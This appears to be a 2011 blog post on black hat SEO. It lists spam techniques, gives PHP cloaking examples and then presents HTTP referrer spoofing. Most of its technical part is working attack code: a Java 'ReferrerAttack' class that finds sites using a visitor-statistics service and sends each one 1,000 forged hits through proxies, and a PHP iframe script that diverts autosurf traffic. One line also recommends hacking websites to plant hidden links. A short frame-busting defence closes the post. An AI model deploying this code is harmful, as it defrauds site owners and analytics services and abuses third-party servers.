rss

HTTP Spoofing and Cloaking - Black Hat SEO

Friday, July 22, 2011

Introduction

As mentioned previously in this post, Search Engine Optimization (SEO) is the process of improving your Web site so it appears higher in the organic, natural, unpaid results of search engines. The varying techniques used for SEO can be lumped into two main categories: White Hat SEO and Black Hat SEO.

Both practices share the same goal of bringing a website to the highest possible organic position. However, as their names suggest, White Hat SEO techniques are safe, reliable, and accepted by Search engines. While Black Hat SEO techniques use methods such as link farms, keyword stuffing and article spinning that degrade the relevance of search. Search engines look for sites that employ these techniques in order to remove them from their indices.

If you hire a company who uses Black Hat SEO techniques, then it’s very possible you will get banned from Google. For anyone whose interested, here it is a list of techniques I retrieved from [2]:
  1. Hidden text

    A hidden text is the textual content in web pages which the visitors cannot see but is still readable by the search engines. The main purpose of the hidden text is to load a Web page with keywords and the keyword phrases that would be invisible to visitors but help in improving the page's rankings in the search engine results. Hidden text is considered as search spam by each of the major search engines, since it presents information to search engines differently than to visitors.

    Text can be hidden in numerous ways, including:
    • Using white color font text on a white background
    • Text behind an image
    • Using CSS to hide text using CSS, which is naturally used to hide large portions of text in layers for usability reasons. Example: CSS pagination.
    • Reducing the font size to 0

  2. Throw Away Domains

    Throwaway domains" are domains created to redirect traffic to other, more long lived domains. They are designed to be used only a few days and then discarded by the time spam filters begin to recognize them. The trick consists in the creation of exact match micro sites for short term popular keywords. Something like wikipediahotelsrehab.com

  3. Donation links

    Donate for charity, software developers etc. Many of them display links to those who donate.

  4. Keyword stuffing

    Tags and folksonomy. Keyword stuff but adding several tags or let your users do the dirty work via UGC tagging (folksonomy) every major social site does that.

  5. Automatically generated keyword pages

    Some shopping search engines create pages from each Google search query and assign the appropriate products to each query. You can do that as well if you have enough content.

  6. Misspellings

    When choosing your keywords you most likely use the correct spelling so your website looks more professional. But did you know misspelling keywords on purpose can also help with your SEO campaign?

    Try different misspellings on Google AdWords Keyword Tool, and see which are searched just as much as the real spelling. For example, the word “jewellery” is a hard one to remember, and search volumes prove this. By searching “Jewellry”, you will find the search volume is just as big as it is for the correct spelling. Optionally, you can redirect to the correct version.

  7. Scraping

    Create mirrors for popular sites. Offer them to the respective webmasters. Most will be glad to pay less.

  8. Ad only pages

    Create all page ads (interstitials) and show them before users see content like many old media do.

  9. Blog spam

    Don’t spam yourself! Create posts about very profitable keywords and let spammers do your job. Then all you need to do is to keep comments containing your keyword and remove all the outgoing links. Bot user generated content so to say.

  10. Duplicate content on multiple domains

    Offer your content under a creative Commons License with attribution.

  11. Domain grabbing

    Buy old authority domains that failed and revive them instead of putting them on sale.

  12. Fake news

    Create real news on official looking sites for real events. You can even do it in print. Works great for all kinds of activism related topics.

  13. Link farm

    Create a legit blog network of flagship blogs. A full time pro blogger can manage 3 to 5 high quality blogs by her or himself.

  14. New exploits

    Find them and report them, blog about them. You break story and thus you get all the attention and links.

  15. Brand jacking

    Write a bad review for a brand that has disappointed you or or set up a brand X sucks page and let consumers voice their concerns.

  16. Rogue bots

    Spider websites and make their webmasters aware of broken links and other issues. Some people may be thankful enough to link to you.

  17. Hidden affiliate links

    In fact hiding affiliate links is good for usability and can be even more ethical than showing them. example.com/ref?id=87233683 is far worse than than just example.com. Also unsuspecting Web users will copy your ad to forums etc. which might break their TOS. The only thing you have to do is disclose the affiliate as such. I prefer to use [ad] (on Twitter for example) or [partner-link] elsewhere. This way you can strip the annoying “ref” ids and achieve full disclosure at the same time.

  18. Doorway pages

    Effectively doorway pages could also be called landing pages. The only difference is that doorway pages are worthless crap while landing pages are streamlined to suffice on their own. Common for both is that they are highly optimized for organic search traffic. So instead of making your doorway pages just a place to get skipped optimize them as landing pages and make the users convert right there.

  19. Multiple subdomains

    Multiple subdomains for one domain can serve an ethical purpose. Just think blogspot.com or wordpress.com – they create multiple subdomains by UGC. This way they can rank several times for a query. You can offer subdomains to your users as well.

  20. Social media automation

    There is nothing wrong with posts automation in Twitter, Facebook or any other social media service, as long as you don’t overdo it. Scheduling and repeating posts is perfectly OK if there is a real person attending that also produces content. Bot accounts can be ethical as well in case they are useful no only for yourself. A bot collecting news about Haiti in the aftermath of the earthquake would be perfectly legit if you ask me.

  21. Deceptive headlines

    Tabloids use them all the time, black hat SEO also do. There are ethical use cases for deceptive headlines though. Satire is one of course and humor simply as well. For instance I could end this list with 24 items and declare this post to a list of 300 items anyways. That would be a good laugh. I’ve done that in the past but in a more humorous post.

  22. Google Bowling

    This practice began when Google started penalizing sites that get lots of incoming links in a very short period. Unscrupulous webmasters realized that this could be used against competitor sites by linking to them instead of their own site. Google claim they have measures in place to prevent this practice from unfairly damaging a site's PageRank. Howerver this is clearly not true.

  23. Invisible links

    We all use them! Most free web counters and statistic tools use them. So when you embed them on your site you use invisible links.

  24. Different content for search engines than users

    Do you use WordPress? Then you have the nofollow attribute added to your comment links. this way the search engine gets different content than the user. We can see it and click on it but for a search bot it'is a no trespass sign. In white hat SEO it’s often called PageRank sculpting. Most social media add ons do that by default.

  25. Hacking sites

    You can always hack a website and add a few links to some old post. If you are smart enough, then no one will ever notice it.

  26. Slander linkbait

    Pulling a Calacanis like “SEO is bullshit” is quite common these days. Why don’t do it the other way around? The anti SEO thing doesn’t work that good anymore unless you are as famous as Robert Scoble. In contrast a post dealing with “100 Reasons to Love SEO Experts” might strike a chord by now.

  27. Map spam

    Instead of faking multiple addresses all over the place just to appear on Google Maps and Local why don’t you simply create an affiliate network of real life small business owners with shops and offices who, for a small amount of money, are your representatives there? All they need to do is to collect your mail from Google and potential clients.

  28. 301 redirects

    Redirect outdated pages to the newer versions or your homepage. When moving to a new domain use them of course as well.

  29. HTTP Cloaking

    Cloaking Involves using the IP address (also called IP delivery) or features of the HTTP request (e.g. the User-Agent field) in order to identify and deliver unique content to a specific IP or User-agent. IP delivery is usually employed to offer the proper localized content to those coming from a country specific IP address.

    A basic example (that does't include location check) is:
    <?php
      $ips = array('1.1.1.1', '2.2.2.2'); // list of IPs
      if (in_array($ip, $ips)){
        header(”HTTP/1.1 301 Moved Permanently”);
        header(”location: http://www.site-two.com”);
        exit;
      }
      else {
        header(’Content-Type: text/html; charset=utf-8.′);
        // Show site one here
      };
    ?>
    
    User-agent Cloaking is another method for delivering different sets of content to different users or spiders.
    <?php
      if (strstr($_SERVER['HTTP_USER_AGENT'], “Googlebot”)) {
        header(”HTTP/1.1 301 Moved Permanently”);
        header(”location: http://www.site-two.com”);
        exit;
      }
      else {
        header(’Content-Type: text/html; charset=utf-8.′);
        // Show site one here
      };
    ?>
    
    Note that by using cloaking you can hide the heavy Flash animations from Google, showing the text-only version optimized for accessibility and findability.

Now that we learned about the most basic Black SEO techniques, let's move on to a slightly different topic: HTTP Spoofing techniques.

Referrer spoofing techniques


In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gaining an illegitimate advantage [1]. Referrer spoofing is a specific type of spoofing attack. For example, some websites, especially pornographic paysites, allow access to their materials only from certain approved (login-) pages. This is enforced by checking the referrer header of the HTTP request. This referrer header however can be changed (known as "referrer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials (e.g. see this old post).

Manipulation web traffic


As I mentioned on my previous post, some of these techniques can be combined together to get free traffic. All you need to do is send spoofed traffic to some specific websites (e.g. specially to websites containing a top referrers list). Once you reach the top of that list, then you will start receiving natural traffic for free. Of course, if you don’t have a link in your website to that website, then the situation looks suspicions !!

There are several ways that can be used to send traffic to a website.

  • Traffic exchange

    The traffic is real, and goes from your website. This is the honest way of doing it. However it requires you to have already a huge amount of visitors.

  • Fake visitors

    This is the cheapest and fastest way of getting free traffic. However it doesn't always work. The only thing you need is an application that can establish a HTTP connecting to the website, using a spoofed referrer. For that you can use a very old library I developed long time ago, which is now available in Google Code. It's quite easy to use and it includes a cookies manager, connections using several proxies, etc.
    /** 
      * This class can be used to define a list of proxies e.g.
      * when you want to route your connection through proxies.
      */
    ProxyManager proxy = new ProxyManager();
    
    /** 
     * Add as many as you want, it will iterate them
     */
    proxy.add("proxy.domain.com", 3128);
    
    /** Activate this ProxySelector */
    proxy.install();
    
    /** If you need cookies for your connection */
    Cookies cookies = new Cookies();
    
    /** Setup the HTTP client  */
    NetworkClient network = new NetworkClient(cookies);
    
    /** or use defaults */
    network = new NetworkClient();
    
    /** Setup the HTTP client headers */
    network.setUserAgent("Mozilla/3.0 (Indy Library)");
    network.setReferer("http://www.yourwebsite.com");
    Logging logger = network.getLogging();
    
    /** Simply repeat the GET request */
    String result = network.request("http://www.target.com");
    if ( result != null && !result.isEmpty() )
      logger.add(Level.FINE, NetworkClientTest.class, result);
    else
      logger.add(Level.SEVERE, NetworkClientTest.class, 
                                         "Couldn't connect!");
    
    /** 
     * If you need to go back to the previous ProxySelector.
     */
    proxy.uninstall();
    

    This flaw is possible only if the website doesn't track IPs. You should be careful if you don't want your website to be affiliated with unwanted websites.

  • Redirect and spoof specific traffic sources.

    Assuming the target website(s) do not check whenever it is displayed on a frame (note that this can be used against you) or not, then you can display your page to your users, and at the same time exchange traffic with several sites!! Unattenious users will not ever notice it. So, it was multiple benefits: the user visits your website, and your website status increases in several websites at the same time. Of course you can always improve this method by having a rotation mechanism, that gives more priority to websites where you rank lower.

    The following example redirects traffic from PTC programs, surfer programs to our target websites by using just one frame. However you can adapt the code to display your website as well as other target sites.
    <?php 
      $referer = $_SERVER['HTTP_REFERER'];
      $hostname = 'http://www.think-techie.com';
      if(strpos($referer, 'autosurf'){
         $idx = rand ( 0, 2 );
         $links = array( 'http://www.site-one.com',
                         'http://www.site-two.com’);
    ?>
    
    <html>
    <head>
    <meta http-equiv="Content-Type" 
          content="text/html; charset=utf-8">
    
    <script language=Javascript>
      var ref;
      ref = document.referrer;
      window.location.href = '<?php echo $links[$idx]; ?>';
    </script>
    
    </head>
    <body>
    <iframe src ="<?php echo $hostname; ?>" 
            width="100%" height="100%">
      <p>Your browser does not support iframes.</p>
    </iframe>
    </body>
    </html>
    
    <?php
      }
      else {
        header ('HTTP/1.1 301 Moved Permanently');
        header ('Location: ' . $hostname);
      }
    ?>
    

  • Exploit services.

    The easiest way of getting free traffic is by exploiting service flaws. Some of the most used services that provide statistics about visitors can be exploited in order to display your website on their list.
    /** The site your want to promote */
    private final String yourWebsite;
    
    /** The service you want to exploit */
    private final String flawService;
    
    /** Your niche keywords */
    private final String [] keywords;
    
    /** HTTP connection handler */
    private NetworkClient network;
    
    /** Default constructor */
    public ReferrerAttack(
                             String yourWebsite, 
                             String flawService,
                             String [] keywords)
    {
      this.yourWebsite = yourWebsite;
      this.flawService = flawService;
      this.keywords = keywords;
     
      /** setup HTTP connection headers */
      network = new NetworkClient();
      network.setUserAgent("Mozilla/3.0 (Indy Library)");
      network.setReferer("http://" + yourWebsite);
    }
    
    public void start() {
      Logging log = network.getLogging();
      log.add(Level.INFO, this.getClass(), 
                           "Searching for possible targets ...");
      ArrayList<String> results = search(-1);
     
      log.add(Level.INFO, this.getClass(), 
                           "Selecting similar targets ...");
      ArrayList<Target> targets = filter(results);
     
      log.add(Level.INFO, this.getClass(), 
                          "Performing attack ..."); 
      attack(targets, 1000);
     
      log.add(Level.INFO, this.getClass(), 
                          "Checking for results ...");
      checker(targets);
    }
    
    /**
     * Search websites having outgoing links to this service 
     * @param limit Limit the number of results
     * @return Return a list a possible targets
     */
    public ArrayList<String> search(int limit) {
      ArrayList<String> targets = new ArrayList<String>();
     
      /** Do not search more then 50 pages */
      for (int i = 0; i < 50; i += 10) {
        String google="http://www.google.com/search?q=link%3A" +
                          flawService + "&start=" + i;
        String out = network.request(google);
        String regex="<h3 class([^>]+)><a href([^hH]+)([^\"]+)";
        Pattern p = Pattern.compile(regex, Pattern.MULTILINE);
        Matcher m = p.matcher(out);
        while (m.find()) {
          try {
             if (limit > 0 && targets.size() >= limit)
               return targets;
    
               String url = m.group(3);
               URL r = new URL(url);
               url = r.getProtocol() + "://" + r.getAuthority();
               if (!targets.contains(url))
                 targets.add(url);
          }
          catch (MalformedURLException e) {
            e.printStackTrace();
          }
       }
     }
     return targets;
    } 
    
    /**
     * Filter similar sites. So you stay inside of your niche
     * @param targets List of all targets
     * @return Possible good targets
     */
    public ArrayList<Target> filter(ArrayList<String> targets){
     ArrayList<Target> filter = new ArrayList<Target>();
     for(String url : targets){
      String html = network.request(url);
      if(html == null) continue;
      Matcher regx = Pattern.compile("<title>([^<]+)", Pattern.MULTILINE).matcher(html);
    
      String title = "";
      if( regx.find() ) title = regx.group(1);
      
      regx = Pattern.compile("write_ref\\(([\\d]+)\\);", Pattern.MULTILINE).matcher(html);
      if( regx.find() ){
       for(String keyword : keywords){
        String[] tokens = title.split(" ");
        boolean tokenFound = false;
        for(String t : tokens){
         if(t.contains(keyword)){
          tokenFound = true;
          break;
         }
        }
        /** SPAM only sites containing relevant keywords */
        if(url.contains(keyword) || tokenFound)  
         filter.add(new Target(title, url, regx.group(1)));
       }
      }
     }
     return filter;
    }
    
    /**
     * Perform the attack to each of these sites
     * @param targets List of sites
     * @param hits Number of fake visits
     */
    public void attack(ArrayList<Target> targets, int hits){
     Logging log = network.getLogging();
     for (int i = 0; i < targets.size(); i++) {
      Target t = targets.get(i);
      int n = hits;
      String url = t.genAttackURL();
      log.add(Level.INFO, this.getClass(), " + Attacking " +
                                                t.getURL());
      while (n > 0) {
       String text = network.request(url);
       if (text == null) {
        log.add(Level.WARNING, this.getClass(), "Site " + 
                                    url + " is not reachable"); 
        break;
       }
       n--;
      }
      log.add(Level.INFO, this.getClass(), t.getURL()+" [Done]");
     }
    }
    
    /**
     * Check if your site is top referrer for some target
     * @param targets List of target sites
     */
    public void checker(ArrayList<Target> targets){
     for(Target target : targets){
      String content = network.request(target.getURL());
      if (content != null) {
       boolean contains = content.contains(yourWebsite);
       network.getLogging().add(Level.INFO, this.getClass(), "[" + contains + "] " + target.url); 
      }
     } 
    }
    
    /**
     * Object holding the information about a target site
     */
    
    class Target {
     
     private String url, title, uid;
     
     public Target(String title, String url, String uid){
      this.url = url;
      this.title = title;
      this.uid = uid;
     }
     
     public String getURL(){
      return url;
     }
     
     public String getTitle(){
      return title;
     }
     
     public String getUID(){
      return uid;
     }
     
     public String genAttackURL(){
      return "http://" + flawService + "/link.php?e_uid=" + uid
        + "&e_ref=" + yourWebsite + "&e_loc=" + url + "&e_title="
        + title;
     }
    }
    

How to protect your website


If you have a top referrer list, make sure you ensure that only unique IP are tracked and ignore users visiting through proxies. Besides that, do not allow your site to be displayed inside iframes. However the following code doesn't protect your website from all possible scenarios, at least you will avoid the most common ones.
<script type="text/javascript">
    if (top.location != self.location)
    top.location = self.location;
</script>

References


[1] Spoofing attack. Wikipedia.
[2] 30 Black Hat SEO Techniques You Can Use Ethically. http://www.seoptimise.com